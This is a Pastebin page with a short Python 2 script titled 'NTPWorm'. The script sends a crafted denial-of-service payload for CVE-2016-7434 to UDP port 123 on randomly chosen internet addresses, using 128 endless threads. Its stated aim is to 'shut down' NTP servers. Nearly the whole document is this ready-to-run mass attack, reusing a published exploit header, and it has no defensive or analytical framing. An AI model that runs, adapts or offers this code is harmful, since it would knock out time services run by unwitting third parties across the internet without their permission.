Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- #
- #this script will scan for NTP servers and shut them down using CVE-2016-7434
- #Coded by Freak@Salamandersquad
- #
- #
- # Exploit Title: ntpd remote pre-auth Denial of Service
- # Date: 2016-11-21
- # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
- # Website: http://dumpco.re/cve-2016-7434/
- # Vendor Homepage: http://www.ntp.org/
- # Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
- # Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
- # CVE: CVE-2016-7434
- import sys
- import socket
- import random
- import struct
- from threading import Thread
- class NTPWorm():
- def __init__(self):
- for i in range(0,128):
- Thread(target=self.worm, args=()).start()
- def worm(self):
- while True:
- payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
- target = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
- port = 123
- print "[-] Sending payload to " + target + ":" + str(port) + " ..."
- sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- try:
- sock.sendto(payload, (target, port))
- print "[+] Done!"
- except Exception, e:
- print "[-] Failed to sent packet: "+str(e)
- pass
- if __name__=="__main__":
- NTPWorm()
Advertisement
Add Comment
Please, Sign In to add comment
